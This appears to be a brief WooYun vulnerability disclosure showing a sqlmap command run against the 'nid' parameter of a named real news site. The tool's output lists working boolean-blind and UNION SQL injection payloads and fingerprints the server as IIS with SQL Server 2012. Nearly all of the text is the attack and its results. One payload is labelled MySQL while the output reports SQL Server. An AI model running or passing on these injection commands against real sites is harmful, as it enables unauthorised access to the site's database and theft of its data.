WooYun.org

sqlmap.py -u "http://news.sciencenet.cn/html/newscomm.aspx?nid=331093" --dbs

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: nid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: nid=331093 AND 3209=3209
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: nid=-9426 UNION ALL SELECT CONCAT(0x7170627171,0x6d716854474c4675797a,0x7170716b71)#
---
[11:30:41] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, Microsoft IIS 8.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2012